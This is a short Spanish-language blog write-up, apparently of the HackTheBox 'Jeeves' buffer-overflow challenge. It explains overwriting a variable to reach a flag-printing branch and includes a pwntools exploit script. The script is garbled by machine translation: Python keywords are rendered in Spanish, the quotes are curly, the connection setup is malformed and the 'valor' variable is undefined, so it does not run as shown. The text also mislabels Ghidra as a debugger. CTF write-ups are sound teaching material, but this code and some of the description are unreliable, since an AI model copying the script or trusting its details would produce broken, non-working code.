Cubrimos un escenario de un binario vulnerable a la vulnerabilidad de desbordamiento del búfer. El binario tiene protecciones NX y PIE habilitadas, por lo que abrimos el binario con el depurador Ghidra y creamos la metodología de explotación basada en el cálculo de las compensaciones de la variable de entrada y otra variable que controla una entrada a una declaración if que imprime la bandera. El objetivo era controlar el valor de ese binario y dejar que el flujo de ejecución ingresara a la declaración if. Esto fue parte de HackTheBox Jeeves Introducción a la pista de explotación binaria.

Notas sobre técnicas de desbordamiento de búfer

El código de explotación está debajo

##Binicio

de importación pwn *

objetivo = proceso ("nc")

target.sendline(“puerto ip”)

carga útil = “A”*60

byte_to_string = p64(valor)

carga útil = carga útil + byte_to_string.decode(“ISO-8859-1”)

target.sendline(carga útil)

imprimir destino.recvuntil(“.”)

##Final

Tutorial en vídeo

Acerca del Autor

Creo notas de ciberseguridad, notas de marketing digital y cursos online. También brindo consultoría de marketing digital que incluye, entre otros, SEO, Google y meta anuncios y administración de CRM.

Ver Artículos